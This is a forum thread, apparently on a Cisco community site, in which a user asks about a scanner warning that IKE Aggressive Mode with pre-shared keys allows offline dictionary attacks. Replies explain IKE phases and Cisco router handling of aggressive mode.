07-30-2007 12:25 AM - edited 03-03-2019 06:05 PM
This threat seems to want me to turn off aggressive mode, does anyone know what this means:
THREAT:
IKE is used during Phase 1 and Phase 2 of establishing an IPSec connection. Phase 1 is where the two ISAKMP peers establish a secure, authenticated channel with which to communicate. Every participant in IKE must possess a key which may be either pre-shared (PSK) or a public key. There are inherent risks to configurations that use pre-shared keys which are exaggerated when Aggressive Mode is used.
IMPACT:
Using Aggressive Mode with pre-shared keys is the least secure option. In this particular scenario, it is possible for an attacker to gather all necessary information in order to mount an off-line dictionary (brute force) attack on the pre-shared keys. For more information about this type of attack, visit http://www.ima.umn.edu/~pliam/xauth/.
SOLUTION:
IKE Aggressive mode with pre-shared keys should be avoided where possible. Otherwise a strong pre-shared key should be chosen.
Note that this attack method has been known and discussed within the IETF IPSec Working Group. The risk was considered as acceptable. For more information on this, visit http://www.vpnc.org/ietf-ipsec/99.ipsec/thrd2.html#01451.
07-30-2007 05:40 AM
Andy
IKE is part of IPSec and provides the service of negotiating working keys and Security Associations for IPSec as was referenced in the explanation of the vulnerability. IKE operates in 2 phases and in phase 1 there is an option for Aggressive Mode, which accomplishes the negotiation with fewer exchanges of messages. By default Cisco routers prefer to not use aggressive mode, but will respond to aggressive mode if that is presented by the peer. It is my understanding that the VPN client frequently uses aggressive mode. And I am not aware of any way on the router to turn off support for aggressive mode. My suggestion to you is to review the preshared keys that are used and then to say: "The risk was considered as acceptable"
HTH
Rick
07-31-2007 02:12 AM
Hi Rick, I don't know why but only 2 837 (out of about 10) have this vulnerability, the only difference is they are on SDSL line and not ADSL lines like the others.
Discover and save your favorite ideas. Come back to expert answers, step-by-step guides, recent topics, and more.
New here? Get started with these tips. How to use Community New member guide